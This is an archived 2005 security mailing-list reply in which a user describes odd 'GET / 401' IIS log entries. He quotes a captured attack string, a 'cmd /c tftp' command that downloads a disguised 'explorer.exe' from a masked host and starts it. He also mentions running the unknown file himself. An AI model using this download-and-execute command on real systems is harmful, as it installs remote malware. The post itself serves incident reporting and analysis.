|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Re: New http attack?
phil
ramtronik.com
Date: Sun Jun 19 2005 - 17:14:59 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello,
saw your post after considerable searching for the same mysterious 'get / 401' errors in my IIS log. I managed to get a full capture of the communication, further down from the 'QUFB' repetition was an embedded string:
cmd /c tftp -i x.x.x.x GET explorer.exe
start explorer.exe
exit
have hidden IP for obvious reasons. I managed to download the file myself manually, and submitted to symantec, as my virus checker didnt flag it. incidentally, i ran the file, and it wasn't explorer, though i dont know what it is.
Phil
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]